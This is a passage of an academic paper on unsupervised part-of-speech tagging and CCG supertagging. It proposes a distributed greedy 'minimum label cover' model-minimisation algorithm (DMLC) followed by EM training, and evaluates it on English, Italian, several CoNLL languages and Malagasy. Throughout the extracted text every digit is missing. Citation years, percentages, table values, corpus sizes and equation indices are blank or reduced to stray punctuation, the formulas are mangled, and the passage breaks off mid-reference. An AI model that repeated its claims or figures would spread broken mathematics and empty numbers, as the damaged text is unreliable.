language, or when there is very little labeled information available for training (banko and moore, ). recently, there has been an increasing amount of research tackling this problem using unsuper- vised methods. a popular approach is to learn from pos-tag dictionaries (merialdo, ), where we are given a raw word sequence and a dictionary of legal tags for each word type. learning from pos- tag dictionaries is still challenging. complete word- tag dictionaries may not always be available for use and in every setting. when they are available, the dictionaries are often noisy, resulting in high tag- ging ambiguity. furthermore, when applying tag- gers in new domains or different datasets, we may encounter new words that are missing from the dic- tionary. there have been some efforts to learn pos taggers from incomplete dictionaries by extending the dictionary to include these words using some heuristics (toutanova and johnson, ) or using other methods such as type-supervision (garrette and baldridge, ). in this work, we tackle the problem of unsuper- vised sequence labeling using tag dictionaries. the first reported work on this problem was on pos tag- ging from merialdo ( ). the approach involved training a standard hidden markov model (hmm) using the expectation maximization (em) algo- rithm (dempster et al., ), though em does not perform well on this task (johnson, ). more re- cent methods have yielded better performance than em (see (ravi and knight, ) for an overview). one interesting line of research introduced by ravi and knight ( ) explores the idea of per- forming model minimization followed by em train- ing to learn taggers. their idea is closely related to the classic minimum description length princi- ple for model selection (barron et al., ). they ( ) formulate an objective function to find the small- est model that explains the text (model minimization step), and then, ( ) fit the minimized model to the data (em step). for pos tagging, this method (ravi and knight, ) yields the best performance to date; . % tagging accuracy on a standard test dataset from the english penn treebank. the orig- inal work from (ravi and knight, ) uses an in- teger linear programming (ilp) formulation to find minimal models, an approach which does not scale to large datasets. ravi et al. ( b) introduced a two-step greedy approximation to the original ob- jective function (called the min-greedy algo- rithm) that runs much faster while maintaining the high tagging performance. garrette and baldridge ( ) showed how to use several heuristics to fur- ther improve this algorithm (for instance, better choice of tag bigrams when breaking ties) and stack other techniques on top, such as careful initialization of hmm emission models which results in further performance gains. their method also works un- der incomplete dictionary scenarios and can be ap- plied to certain low-resource scenarios (garrette and baldridge, ) by combining model minimization with supervised training. in this work, we propose a new scalable algorithm for performing model minimization for this task. by making an assumption on the structure of the solu- tion, we prove that a variant of the greedy set cover algorithm always finds an approximately optimal la- bel set. this is in contrast to previous methods that employ heuristic approaches with no guarantee on the quality of the solution. in addition, we do not have to rely on ad hoc tie-breaking procedures or careful initializations for unknown words. finally, not only is the proposed method approximately op- timal, it is also easy to distribute, allowing it to eas- ily scale to very large datasets. we show empirically that our method, combined with an em training step outperforms existing state of the art systems. . our contributions • we present a new method, distributed minimum label cover, dmlc, for model minimization that uses a fast, greedy algorithm with formal approximation guarantees to the quality of the solution. • we show how to efficiently parallelize the al- gorithm while preserving approximation guar- antees. in contrast, existing minimization ap- proaches cannot match the new distributed al- gorithm when scaling from thousands to mil- lions or even billions of tokens. • we show that our method easily scales to both large data and grammar sizes, and does not re- quire the corpus or label set to fit into memory. this allows us to tackle complex tagging tasks, where the tagset consists of several thousand labels, which results in more than one million entires in the grammar. • we demonstrate the power of the new method by evaluating under several differ- ent scenarios—pos tagging for multiple lan- guages (including low-resource languages), with complete and incomplete dictionaries, as well as a complex sequence labeling task of su- pertagging. our results show that for all these settings, our method achieves state-of-the-art performance yielding high quality taggings. related work recently, there has been an increasing amount of research tackling this problem from multiple di- rections. some efforts have focused on inducing pos tag clusters without any tags (christodoulopou- los et al., ; reichart et al., ; moon et al., ), but evaluating such systems proves dif- ficult since it is not straightforward to map the clus- ter labels onto gold standard tags. a more pop- ular approach is to learn from pos-tag dictionar- ies (merialdo, ; ravi and knight, ), incom- plete dictionaries (hasan and ng, ; garrette and baldridge, ) and human-constructed dictionar- ies (goldberg et al., ). another direction that has been explored in the past includes bootstrapping taggers for a new lan- guage based on information acquired from other lan- guages (das and petrov, ) or limited annota- tion resources (garrette and baldridge, ). ad- ditional work focused on building supervised tag- gers for noisy domains such as twitter (gimpel et al., ). while most of the relevant work in this area centers on pos tagging, there has been some work done for building taggers for more complex sequence labeling tasks such as supertagging (ravi et al., a). other related work include alternative methods for learning sparse models via priors in bayesian in- ference (goldwater and griffiths, ) and poste- rior regularization (ganchev et al., ). but these methods only encourage sparsity and do not explic- itly seek to minimize the model size, which is the ob- jective function used in this work. moreover, taggers learned using model minimization have been shown to produce state-of-the-art results for the problems discussed here. model following ravi and knight ( ), we formulate the problem as that of label selection on the sentence graph. formally, we are given a set of sequences, s = {s ,s , . . . ,sn} where each si is a sequence of words, si = wi ,wi , . . . ,wi,|si|. with each word wij we associate a set of possible tags tij. we will denote by m the total number of (possibly du- plicate) words (tokens) in the corpus. additionally, we define two special words w and w∞ with special tags start and end, and consider the modified sequences s′i = w ,si,w∞. to sim- plify notation, we will refer to w∞ = w|si|+ . the sequence label problem asks us to select a valid tag tij ∈ tij for each word wij in the input to minimize a specific objective function. we will refer to a tag pair (ti,j− , tij) as a label. our aim is to minimize the number of distinct labels used to cover the full input. formally, given a se- quence s′i and a tag tij for each word wij in s ′ i, let the induced set of labels for sequence s′i be li = |s′i|⋃ j= {(ti,j− , tij)}. the total number of distinct labels used over all se- quences is then φ = ∣∣∪i li| = ∣∣⋃ i |si|+ ⋃ j= {(ti,j− , tij)}|. note that the order of the tokens in the label makes a difference as {(nn, vp)} and {(vp, nn)} are two distinct labels. now we can define the problem formally, follow- ing (ravi and knight, ). problem (minimum label cover). given a set s of sequences of words, where each word wij has a set of valid tags tij, the problem is to find a valid tag assignment tij ∈ tij for each word that minimizes the number of distinct labels or tag pairs over all sequences, φ = ∣∣⋃ i ⋃|si|+ j= {(ti,j− , tij)}| . the problem is closely related to the classical set cover problem and is also np-complete. to reduce set cover to the label selection problem, map each element i of the set cover instance to a single word sentence si = wi , and let the valid tags ti con- tain the names of the sets that contain element i. consider a solution to the label selection problem; every sentence si is covered by two labels (w ,ki) and (ki,w∞), for some ki ∈ ti , which corresponds to an element i being covered by set ki in the set cover instance. thus any valid solution to the label selection problem leads to a feasible solution to the set cover problem ({k ,k , . . .}) of exactly half the size. finally, we will use {{. . .}} notation to denote a multiset of elements, i.e. a set where an element may appear multiple times. algorithm in this section, we describe the distributed- minimum-label-cover, dmlc, algorithm for approximately solving the minimum label cover problem. we describe the algorithm in a central- ized setting, and defer the distributed implementa- tion to section . before describing the algorithm, we briefly explain the relationship of the minimum label cover problem to set cover. . modification of set cover as we pointed out earlier, the minimum label cover problem is at least as hard as the set cover prob- : input: a set of sequences s with each words wij having possible tags tij. : output: a tag assignment tij ∈ tij for each word wij approximately minimizing labels. : let m be the multi set of all possible labels generated by choosing each possible tag t ∈ tij. m = ⋃ i   |si|+ ⋃ j= ⋃ t′∈ti,j− t∈tij {{(t′, t)}}   ( ) : let l = ∅ be the set of selected labels. : repeat : select the most frequent label not yet se- lected: (t′, t) = arg max(s′,s)/∈l |m ∩ (s′,s)|. : for each bigram (wi,j− ,wij) where t′ ∈ ti,j− and t ∈ tij tentatively assign t′ to wi,j− and t to wij. add (t′, t) to l. : if a word gets two assignments, select one at random with equal probability. : if a bigram (wij,wi,j+ ) is consistent with assignments in (t,t′), fix the tenta- tive assignments, and set ti,j− = {t′} and tij = t. recompute m, the multi- set of possible labels, with the updated ti,j− and tij. : until there are no unassigned words algorithm : mlc algorithm : input: a set of sequences s with each words wij having possible tags tij. : output: a tag assignment tij ∈ tij for each word wij approximately minimizing labels. : (graph creation) initialize each vertex vij with the set of possible tags tij and its neighbors vi,j+ and vi,j− . : repeat : (message passing) each vertex vij sends its pos- sibly tags tij to its forward neighbor vij+ . : (counter update) each vertex receives the the tags ti,j− and adds all possible labels {(s,s′)|s ∈ ti,j− ,s′ ∈ tij} to a global counter (m). : (maxlabel selection) each vertex queries the global counter m to find the maximum label (t,t′). : (tentative assignment) each vertex vij selects a tag tentatively as follows: if one of the tags t,t′ is in the feasible set tij, it tentatively selects the tag. : (random assignment) if both are feasible it se- lects one at random. the vertex communicates its assignment to its neighbors. : (confirmed assignment) each vertex receives the tentative assignment from its neighbors. if together with its neighbors it can match the se- lected label, the assignment is finalized. if the assigned tag is t , then the vertex vij sets the valid tag set tij to {t}. : until no unassigned vertices exist. algorithm : dmlc implementation lem. an additional challenge comes from the fact that labels are tags for a pair of words, and hence are related. for example, if we label a word pair (wi,j− ,wij) as (nn, vp), then the label for the next word pair (wij,wi,j+ ) has to be of the form (vp, *), i.e., it has to start with vp. previous work (ravi et al., a; ravi et al., b) recognized this challenge and employed two phase heuristic approaches. eschewing heuristics, we will show that with one natural assumption, even with this extra set of constraints, the standard greedy algorithm for this problem results in a solution with a provable approximation ratio of o(log m). in practice, however, the algorithm performs far better than the worst case ratio, and similar to the work of (gomes et al., ), we find that the greedy approach selects a cover approximately % worse than the optimum solution. . mlc algorithm we present in algorithm our minimum label cover algorithm to approximately solve the mini- mum label cover problem. the algorithm is simple, efficient, and easy to distribute. the algorithm chooses labels one at a time, select- ing a label that covers as many words as possible in every iteration. for this, it generates and maintains a multi-set of all possible labels m (step ). the multi-set contains an occurrence of each valid label, for example, if wi,j− has two possible valid tags nn and vp, and wij has one possible valid tag vp, then m will contain two labels, namely (nn, vp) and (vp, vp). since m is a multi-set it will contain duplicates, e.g. the label (nn, vp) will appear for each adjacent pair of words that have nn and vp as valid tags, respectively. in each iteration, the algorithm picks a label with the most number of occurrences in m and adds it to the set of chosen labels (step ). intuitively, this is a greedy step to select a label that covers the most number of word pairs. once the algorithm picks a label (t′, t), it tries to assign as many words to tags t or t′ as possible (step ). a word can be assigned t′ if t′ is a valid tag for it, and t a valid tag for the next word in sequence. similarly, a word can be assigned t, if t is a valid tag for it, and t′ a valid tag for the previous word. some words can get both assignments, in which case we choose one tentatively at random (step ). if a word’s tentative random tag, say t, is consistent with the choices of its adjacent words (say t′ from the previous word), then the tentative choice is fixed as a permanent one. whenever a tag is selected, the set of valid tags tij for the word is reduced to a sin- gleton {t}. once the set of valid tags tij changes, the multi-set m of all possible labels also changes, as seen from eq . the multi-set is then recom- puted (step ) and the iterations repeated until all of words have been tagged. we can show that under a natural assumption this simple algorithm is approximately optimal. assumption (c-feasibility). let c ≥ be any num- ber, and k be the size of the optimal solution to the original problem. in each iteration, the mlc algo- rithm fixes the tags for some words. we say that the algorithm is c-feasible, if after each iteration there exists some solution to the remaining problem, con- sistent with the chosen tags, with size at most ck . the assumption encodes the fact that a single bad greedy choice is not going to destroy the overall structure of the solution, and a nearly optimal so- lution remains. we note that this assumption of c- feasibility is not only sufficient, as we will formally show, but is also necessary. indeed, without any as- sumptions, once the algorithm fixes the tag for some words, an optimal label may no longer be consis- tent with the chosen tags, and it is not hard to find contrived examples where the size of the optimal so- lution doubles after each iteration of mlc. since the underlying problem is np-complete, it is computationally hard to give direct evidence ver- ifying the assumption on natural language inputs. however, on small examples we are able to show that the greedy algorithm is within a small constant factor of the optimum, specifically it is within % of the optimum model size for the pos tagging problem using the standard k dataset (ravi and knight, ). combined with the fact that the final method outperforms state of the art approaches, this leads us to conclude that the structural assumption is well justified. lemma . under the assumption of c-feasibility, the mlc algorithm achieves a o(c log m) approx- imation to the minimum label cover problem, where m = ∑ i |si| is the total number of tokens. proof. to prove the lemma we will define an objec- tive function φ̄, counting the number of unlabeled word pairs, as a function of possible labels, and show that φ̄ decreases by a factor of ( −o( /ck)) at every iteration. to define φ̄, we first define φ, the number of la- beled word pairs. consider a particular set of la- bels, l = {l ,l , . . . ,lk} where each label is a pair (ti, tj). call {tij} a valid assignment of to- kens if for each wij, we have tij ∈ tij. then the score of l under an assignment t, which we denote by φt, is the number of bigram labels that appear in l. formally, φt(l) = | ∪i,j {{(ti,j− , tij) ∩l}}|. finally, we define φ(l) to be the best such assign- ment, φ(l) = maxt φt(l), and φ̄(l) = m−φ(l) the number of uncovered labels. consider the label selected by the algorithm in ev- ery step. by the c-feasibility assumption, there ex- ists some solution having ck labels. thus, some la- bel from that solution covers at least a /ck fraction of the remaining words. the selected label (t,t′) maximizes the intersection with the remaining fea- sible labels. the conflict resolution step ensures that in expectation the realized benefit is at least a half of the maximum, thereby reducing φ̄ by at least a ( − / ck) fraction. therefore, after o(kc log m) operations all of the labels are covered. . fitting the model using em once the greedy algorithm terminates and returns a minimized grammar of tag bigrams, we follow the approach of ravi and knight ( ) and fit the min- imized model to the data using the alternating em strategy. in this step, we run an alternating optimization procedure iteratively in phases. in each phase, we initialize (and prune away) parameters within the two hmm components (transition or emission model) using the output from the previous phase. we initialize this procedure by restricting the tran- sition parameters to only those tag bigrams selected in the model minimization step. we train in con- junction with the original emission model using em algorithm which prunes away some of the emission parameters. in the next phase, we alternate the ini- tialization by choosing the pruned emission model along with the original transition model (with full set of tag bigrams) and retrain using em. the alter- nating em iterations are terminated when the change in the size of the observed grammar (i.e., the number of unique bigrams in the tagging output) is ≤ %. we refer to our entire approach using greedy mini- mization followed by em training as dmlc + em. distributed implementation the dmlc algorithm is directly suited towards parallelization across many machines. we turn to pregel (malewicz et al., ), and its open source version giraph (apa, ). in these systems the computation proceeds in rounds. in every round, ev- ery machine does some local processing and then sends arbitrary messages to other machines. se- mantically, we think of the communication graph as fixed, and in each round each vertex performs some local computation and then sends messages to its neighbors. this mode of parallel programming di- rects the programmers to “think like a vertex.” the specific systems like pregel and giraph build infrastructure that ensures that the overall system for more details on the alternating em strategy and how initialization with minimized models improve em performance in alternating iterations, refer to (ravi and knight, ). is fault tolerant, efficient, and fast. in addition, they provide implementation of commonly used dis- tributed data structures, such as, for example global counters. the programmer’s job is simply to specify the code that each vertex will run at every round. we implemented the dmlc algorithm in pregel. the implementation is straightforward and given in algorithm . the multi-set m of algorithm is represented as a global counter in algorithm . the message passing (step ) and counter update (step ) steps update this global counter and hence per- form the role of step of algorithm . step se- lects the label with largest count, which is equivalent to the greedy label picking step of algorithm . fi- nally steps , , and update the tag assignment of each vertex performing the roles of steps , , and , respectively, of algorithm . . speeding up the algorithm the implementation described above directly copies the sequential algorithm. here we describe addi- tional steps we took to further improve the parallel running times. singleton sets: as the parallel algorithm pro- ceeds, the set of feasible sets associated with a node slowly decreases. at some point there is only one tag that a node can take on, however this tag is rare, and so it takes a while for it to be selected using the greedy strategy. nevertheless, if a node and one of its neighbors have only a single tag left, then it is safe to assign the unique label . modifying the graph: as is often the case, the bottleneck in parallel computations is the commu- nication. to reduce the amount of communication we reduce the graph on the fly, removing nodes and edges once they no longer play a role in the compu- tation. this simple modification decreases the com- munication time in later rounds as the total size of the problem shrinks. experiments and results in this section, we describe the experimental setup for various tasks, settings and compare empirical performance of our method against several existing we must judiciously initialize the global counter to take care of this assignment, but this is easily accomplished. baselines. the performance results for all systems (on all tasks) are measured in terms of tagging accu- racy, i.e. % of tokens from the test corpus that were labeled correctly by the system. . part-of-speech tagging task . . tagging using a complete dictionary data: we use a standard test set (consisting of , word tokens from the penn treebank) for the pos tagging task. the tagset consists of dis- tinct tag labels and the dictionary contains , word/tag pairs derived from the entire penn tree- bank. per-token ambiguity for the test data is about . tags/token. in addition to the standard k dataset, we also train and test on larger data sets— k tokens from the penn treebank, m tokens from ptb+europarl (koehn, ) data. methods: we evaluate and compare performance for pos tagging using four different methods that employ the model minimization idea combined with em training: • em: training a bigram hmm model using em algorithm (merialdo, ). • ilp + em: minimizing grammar size using integer linear programming, followed by em training (ravi and knight, ). • min-greedy + em: minimizing grammar size using the two-step greedy method (ravi et al., b). • dmlc + em: this work. results: table shows the results for pos tag- ging on english penn treebank data. on the smaller test datasets, all of the model minimization strate- gies (methods , , ) tend to perform equally well, yielding state-of-the-art results and large improve- ment over standard em. when training (and testing) on larger corpora sizes, dmlc yields the best re- ported performance on this task to date. a major advantage of the new method is that it can easily scale to large corpora sizes and the distributed na- ture of the algorithm still permits fast, efficient op- timization of the global objective function. so, un- like the earlier methods (such as min-greedy) it is fast enough to run on several millions of tokens to yield additional performance gains (shown in last column). speedups: we also observe a significant speedup when using the parallelized version of the dmlc algorithm. performing model minimization on the k tokens dataset takes seconds on a single ma- chine, whereas parallelization permits model mini- mization to be feasible even on large datasets. fig shows the running time for dmlc when run on a cluster of machines. we vary the input data size from m word tokens to about m word tokens, while holding the resources constant. both the algo- rithm and its distributed implementation in dmlc are linear time operations as evident by the plot. in fact, for comparison, we also plot a straight line passing through the first two runtimes. the straight line essentially plots runtimes corresponding to a linear speedup. dmlc clearly achieves better run- times showing even better than linear speedup. the reason for this is that distributed version has a con- stant overhead for initialization, independent of the data size. while the running time for rest of the im- plementation is linear in data size. thus, as the data size becomes larger, the constant overhead becomes less significant, and the distributed implementation appears to complete slightly faster as data size in- creases. figure : runtime vs. data size (measured in # of word tokens) on machines. for comparison, we also plot a straight line passing through the first two runtimes. the straight line essentially plots runtimes corresponding to a linear speedup. dmlc clearly achieves better runtimes showing a better than linear speedup. . . tagging using incomplete dictionaries we also evaluate our approach for pos tagging under other resource-constrained scenarios. obtain- method tagging accuracy (%) te= k te= k tr= k tr= k tr= . m . em . . . ilp + em (ravi and knight, ) . . min-greedy + em (ravi et al., b) . . . dmlc + em (this work) . . . table : results for unsupervised part-of-speech tagging on english penn treebank dataset. tagging accuracies for different methods are shown on multiple datasets. te shows the size (number of tokens) in the test data, tr represents the size of the raw text used to perform model minimization. ing a complete dictionary is often difficult, espe- cially for new domains. to verify the utility of our method when the input dictionary is incomplete, we evaluate against standard datasets used in previous work (garrette and baldridge, ) and compare against the previous best reported performance for the same task. in all the experiments (described here and in subsequent sections), we use the fol- lowing terminology—raw data refers to unlabeled text used by different methods (for model minimiza- tion or other unsupervised training procedures such as em), dictionary consists of word/tag entries that are legal, and test refers to data over which tagging evaluation is performed. english data: for english pos tagging with in- complete dictionary, we evaluate on the penn tree- bank (marcus et al., ) data. following (garrette and baldridge, ), we extracted a word-tag dic- tionary from sections - ( , tokens) con- sisting of , word types, , word/tag en- tries, a per-type ambiguity of . yielding a per- token ambiguity of . on the raw corpus (treating unknown words as having all possible tags). as in their setup, we then use the first , tokens of section as raw data and perform final evalua- tion on the sections - . we use the raw corpus along with the unlabeled test data to perform model minimization and em training. unknown words are allowed to have all possible tags in both these pro- cedures. italian data: the minimization strategy pre- sented here is a general-purpose method that does not require any specific tuning and works for other languages as well. to demonstrate this, we also per- form evaluation on a different language (italian) us- ing the tut corpus (bosco et al., ). follow- ing (garrette and baldridge, ), we use the same data splits as their setting. we take the first half of each of the five sections to build the word-tag dic- tionary, the next quarter as raw data and the last quarter as test data. the dictionary was constructed from , tokens comprised of , word types, , word/tag pairs, per-type ambiguity of . and a per-token ambiguity of . on the raw data. the raw data consisted of , tokens and the test con- tained , tokens. we use the unlabeled corpus from the raw and test data to perform model mini- mization followed by unsupervised em training. other languages: in order to test the effective- ness of our method in other non-english settings, we also report the performance of our method on sev- eral other indo-european languages using treebank data from conll-x and conll- shared tasks on dependency parsing (buchholz and marsi, ; nivre et al., ). the corpus statistics for the five languages (danish, greek, italian, portuguese and spanish) are listed below. for each language, we construct a dictionary from the raw training data. the unlabeled corpus from the raw training and test data is used to perform model minimization fol- lowed by unsupervised em training. as before, un- known words are allowed to have all possible tags. we report the final tagging performance on the test data and compare it to baseline em. garrette and baldridge ( ) treat unknown words (words that appear in the raw text but are missing from the dictionary) in a special manner and use several heuristics to perform better initialization for such words (for example, the probability that an unknown word is associated with a particular tag is conditioned on the openness of the tag). they also use an auto-supervision technique to smooth counts learnt from em onto new words encountered dur- ing testing. in contrast, we do not apply any such technique for unknown words and allow them to be mapped uniformly to all possible tags in the dictio- nary. for this particular set of experiments, the only difference from the garrette and baldridge ( ) setup is that we include unlabeled text from the test data (but without any dictionary tag labels or special heuristics) to our existing word tokens from raw text for performing model minimization. this is a stan- dard practice used in unsupervised training scenar- ios (for example, bayesian inference methods) and in general for scalable techniques where the goal is to perform inference on the same data for which one wishes to produce some structured prediction. language train dict test (tokens) (entries) (tokens) danish greek italian portuguese spanish results: table (column ) compares previously reported results against our approach for english. we observe that our method obtains a huge improve- ment over standard em and gets comparable results to the previous best reported scores for the same task from (garrette and baldridge, ). it is encourag- ing to note that the new system achieves this per- formance without using any of the carefully-chosen heuristics employed by the previous method. how- ever, we do note that some of these techniques can be easily combined with our method to produce fur- ther improvements. table (column ) also shows results on ital- ian pos tagging. we observe that our method achieves significant improvements in tagging accu- racy over all the baseline systems including the pre- vious best system (+ . %). this demonstrates that the method generalizes well to other languages and produces consistent tagging improvements over ex- isting methods for the same task. results for pos tagging on conll data in five different languages are displayed in figure . note that the proportion of raw data in test versus train danish greek italian portuguese spanish . . . . . . . . . em dmlc+em �� � � � �� � �� �� �� � figure : part-of-speech tagging accuracy for different languages on conll data using incomplete dictionaries. (from the standard conll shared tasks) is much smaller compared to the earlier experimental set- tings. in general, we observe that adding more raw data for em training improves the tagging quality (same trend observed earlier in table : column versus column ). despite this, dmlc + em still achieves significant improvements over the baseline em system on multiple languages (as shown in fig- ure ). an additional advantage of the new method is that it can easily scale to larger corpora and it pro- duces a much more compact grammar that can be efficiently incorporated for em training. . . tagging for low-resource languages learning part-of-speech taggers for severely low- resource languages (e.g., malagasy) is very chal- lenging. in addition to scarce (token-supervised) labeled resources, the tag dictionaries avail- able for training taggers are tiny compared to other languages such as english. garrette and baldridge ( ) combine various supervised and semi-supervised learning algorithms into a common pos tagger training pipeline to addresses some of these challenges. they also report tagging accuracy improvements on low-resource languages when us- ing the combined system over any single algorithm. their system has four main parts, in order: ( ) tag dictionary expansion using label propagation algo- rithm, ( ) weighted model minimization, ( ) ex- pectation maximization (em) training of hmms us- ing auto-supervision, ( ) maxent markov model (memm) training. the entire procedure results in a trained tagger model that can then be applied to tag any raw data. step in this procedure involves for more details, refer (garrette and baldridge, ). method tagging accuracy (%) english (ptb - ) italian (tut) . random . . . em . . . type-supervision + hmm initialization (garrette and baldridge, ) . . . dmlc + em (this work) . . table : part-of-speech tagging accuracy using ptb sections - and tut to build the tag dictionary. for compar- ison, we also include the results for the previously reported state-of-the-art system (method ) for the same task. method tagging accuracy (%) total known unknown low-resource tagging using (garrette and baldridge, ) . ( . ) . ( . ) . ( . ) low-resource tagging using dmlc + em (this work) . ( . ) . ( . ) . ( . ) table : part-of-speech tagging accuracy for a low-resource language (malagasy) on all/known/unknown tokens in the test data. tagging performance is shown for multiple experiments using different (incomplete) dictionary sizes: (a) small, (b) tiny (shown in parentheses). the new method (row ) significantly outperforms the existing method with p < . for small dictionary and p < . for tiny dictionary. a weighted version of model minimization which uses the multi-step greedy approach from ravi et al. ( b) enhanced with additional heuristics that uses tag weights learnt via label propagation (in step ) within the minimization process. we replace the model minimization procedure in their step with our method (dmlc + em) and di- rectly compare this new system with their approach in terms of tagging accuracy. note for all other steps in the pipeline we follow the same procedure (and run the same code) as garrette and baldridge ( ), including the same smoothing procedure for em ini- tialization in step . data: we use the exact same setup as garrette and baldridge ( ) and run experiments on mala- gasy, an austronesian language spoken in madagas- car. we use the publicly available data : k raw tokens for training, a word-tag dictionary acquired with hours of human annotation effort (used for type-supervision), and a held-out test dataset ( tokens). we provide the unlabeled corpus from the raw training data along with the word-tag dictionary as input to model minimization and evaluate on the test corpus. we run multiple experiments for dif- ferent (incomplete) dictionary scenarios: (a) small = word/tag pairs, (b) tiny = word/tag pairs. results: table shows results on malagasy data comparing a system that employs (unweighted) github.com/ dhgarrette/low-resource-pos-tagging- dmlc against the existing state-of-the-art system that incorporates a multi-step weighted model min- imization combined with additional heuristics. we observe that switching to the new model minimiza- tion procedure alone yields significant improvement in tagging accuracy under both dictionary scenarios. it is encouraging that a better minimization proce- dure also leads to higher tagging quality on the un- known word tokens (column in the table), even when the input dictionary is tiny. . supertagging compared to pos tagging, a more challenging task is learning supertaggers for lexicalized grammar formalisms such as combinatory categorial gram- mar (ccg) (steedman, ). for example, ccg- bank (hockenmaier and steedman, ) contains distinct supertags (lexical categories) and the most ambiguous word has supertags. this pro- vides a much more challenging starting point for the semi-supervised methods typically applied to the task. yet, this is an important task since cre- ating grammars and resources for ccg parsers for new domains and languages is highly labor- and knowledge-intensive. as described earlier, our approach scales easily to large datasets as well as label sizes. to evaluate it on the supertagging task, we use the same dataset from (ravi et al., a) and compare against their base- line method that uses an modified (two-step) version method supertagging accuracy (%) ambiguous total . em . . . ilp∗ + em (ravi et al., a) . . . dmlc + em (this work) . . table : results for unsupervised supertagging with a dictionary. here, we report the total accuracy as well as accuracy on just the ambiguous tokens (i.e., tokens which have more than one tagging possibility). ∗the baseline method requires several pre-processing steps in order to run feasibly for this task (described in section . ). in contrast, the new approach (dmlc) runs fast and also permits efficient parallelization. of the ilp formulation for model minimization. data: we use the ccgbank data for this ex- periment. this data was created by semi- auto- matically converting the penn treebank to ccg derivations (hockenmaier and steedman, ). we use the standard splits of the data used in semi- supervised tagging experiments (banko and moore, )—sections - for training (i.e., to construct the word-tag dictionary), and sections - for test. results: table compares the results for two baseline systems—standard em (method ), and a previously reported system using model minimiza- tion (method ) for the same task. we observe that dmlc produces better taggings than either of these and yields significant improvement in accu- racy (+ % overall, + . % on ambiguous tokens). note that it is not feasible to run the ilp-based baseline (method in the table) directly since it is very slow in practice, so ravi et al. ( a) use a set of pre-processing steps to prune the original grammar size (unique tag pairs) from > m to sev- eral thousand entries followed by a modified two- step ilp minimization strategy. this is required to permit their model minimization step to be run in a feasible manner. on the other hand, the new ap- proach dmlc (method ) scales better even when the data/label sizes are large, hence it can be run with the full data using the original model minimization formulation (rather than a two-step heuristic). ravi et al. ( a) also report further improve- ments using an alternative approach involving an ilp-based weighted minimization procedure. in section we briefly discuss how the dmlc method can be extended to this setting and combined with other similar methods. discussion and conclusion we present a fast, efficient model minimization algorithm for unsupervised tagging that improves upon previous two-step heuristics. we show that un- der a fairly natural assumption of c-feasibility the solution obtained by our minimization algorithm is o(c log m)-approximate to the optimal. although in the case of two-step heuristics, the first step guar- antees an o(log m)-approximation, the second step, which is required to get a consistent solution, can introduce many additional labels resulting in a so- lution arbitrarily away from the optimal. our one step approach ensures consistency at each step of the algorithm, while the c-feasibility assumption means that the solution does not diverge too much from the optimal in each iteration. in addition to proving approximation guarantees for the new algorithm, we show that it is paralleliz- able, allowing us to easily scale to larger datasets than previously explored. our results show that the algorithm achieves state-of-the-art performance, outperforming existing methods on several differ- ent tasks (both pos tagging and supertagging) and works well even with incomplete dictionaries and extremely low-resource languages like malagasy. for future work, it would be interesting to apply a weighted version of the dmlc algorithm where la- bels (i.e., tag pairs) can have different weight distri- butions instead of uniform weights. our algorithm can be extended to allow an input weight distribu- tion to be specified for minimization. in order to initialize the weights we could use existing strate- gies such as grammar-informed initialization (ravi et al., a) or output distributions learnt via other methods such as label propagation (garrette and baldridge, ). references . apache giraph. http://giraph.apache. org/. michele banko and robert c. moore. . part-of- speech tagging in context. in proceedings of coling, pages – . andrew r barron, jorma rissanen, and bin yu. . the minimum description length principle in cod- ing and modeling. ieee transactions of information theory, ( ): – . cristina bosco, vincenzo lombardo, daniela vassallo, and leonardo lesmo. . building a treebank for italian: a data-driven annotation schema. in proceed- ings of the second international conference on lan- guage resources and evaluation lrec- , pages – . sabine buchholz and erwin marsi. . conll-x shared task on multilingual dependency parsing. in proceed- ings of conll, pages – . christos christodoulopoulos, sharon goldwater, and mark steedman. . two decades of unsupervised pos induction: how far have we come? in proceed- ings of the conference on empirical methods in natu- ral language processing (emnlp), pages – . dipanjan das and slav petrov. . unsupervised part- of-speech tagging with bilingual graph-based projec- tions. in proceedings of the th annual meeting of the association for computational linguistics: hu- man language technologies - volume , pages – . a. p. dempster, n. m. laird, and d. b. rubin. . maximum likelihood from incomplete data via the em algorithm. journal of the royal statistical society, se- ries b, ( ): – . kuzman ganchev, joão graça, jennifer gillenwater, and ben taskar. . posterior regularization for struc- tured latent variable models. journal of machine learning research, : – . dan garrette and jason baldridge. . type- supervised hidden markov models for part-of-speech tagging with incomplete tag dictionaries. in proceed- ings of the conference on empirical methods in nat- ural language processing and computational natu- ral language learning (emnlp-conll), pages – . dan garrette and jason baldridge. . learning a part-of-speech tagger from two hours of annotation. in proceedings of the conference of the north american chapter of the association for computational linguis- tics: human language technologies, pages – . kevin gimpel, nathan schneider, brendan o’connor, dipanjan das, daniel mills, jacob eisenstein, michael heilman, dani yogatama, jeffrey flanigan, and noah a. smith. . part-of-speech tagging for twitter: annotation, features, and experiments. in pro- ceedings of the th annual meeting of the associa- tion for computational linguistics: human language technologies: short papers - volume , pages – . yoav goldberg, meni adler, and michael elhadad. . em can find pretty good hmm pos-taggers (when given a good start). in proceedings of acl, pages – . sharon goldwater and thomas l. griffiths. . a fully bayesian approach to unsupervised part-of- speech tagging. in acl. fernando c. gomes, cludio n. meneses, panos m. pardalos, and gerardo valdisio r. viana. . ex- perimental analysis of approximation algorithms for the vertex cover and set covering problems. kazi saidul hasan and vincent ng. . weakly super- vised part-of-speech tagging for morphologically-rich, resource-scarce languages. in proceedings of the th conference on the european chapter of the associa- tion for computational linguistics, pages – . julia hockenmaier and mark steedman. . ccg- bank: a corpus of ccg derivations and dependency structures extracted from the penn treebank. compu- tational linguistics, ( ): – . mark johnson. . why doesn’t em find good hmm pos-taggers? in proceedings of the joint conference on empirical methods in natural language process- ing and computational natural language learning (emnlp-conll), pages – . philipp koehn. . europarl: a parallel corpus for statistical machine translation. in machine transla- tion summit x, pages – . grzegorz malewicz, matthew h. austern, aart j.c bik, james c. dehnert, ilan horn, naty leiser, and grze- gorz czajkowski. . pregel: a system for large- scale graph processing. in proceedings of the acm sigmod international conference on manage- ment of data, pages – . mitchell p. marcus, beatrice santorini, and mary ann marcinkiewicz. . building a large annotated cor- pus of english: the penn treebank. computational linguistics, ( ): – . bernard merialdo. . tagging english text with a probabilistic model. computational linguistics, ( ): – . taesun moon, katrin erk, and jason baldridge. . crouching dirichlet, hidden markov model: unsu- pervised pos tagging with context local tag genera- tion. in proceedings of the conference on empirical methods in natural language processing, pages – . joakim nivre, johan hall, sandra kübler, ryan mcdon- ald, jens nilsson, sebastian riedel, and deniz yuret. . the conll shared task on dependency parsing. in proceedings of the conll shared task session of emnlp-conll, pages – . sujith ravi and kevin knight. . minimized models for 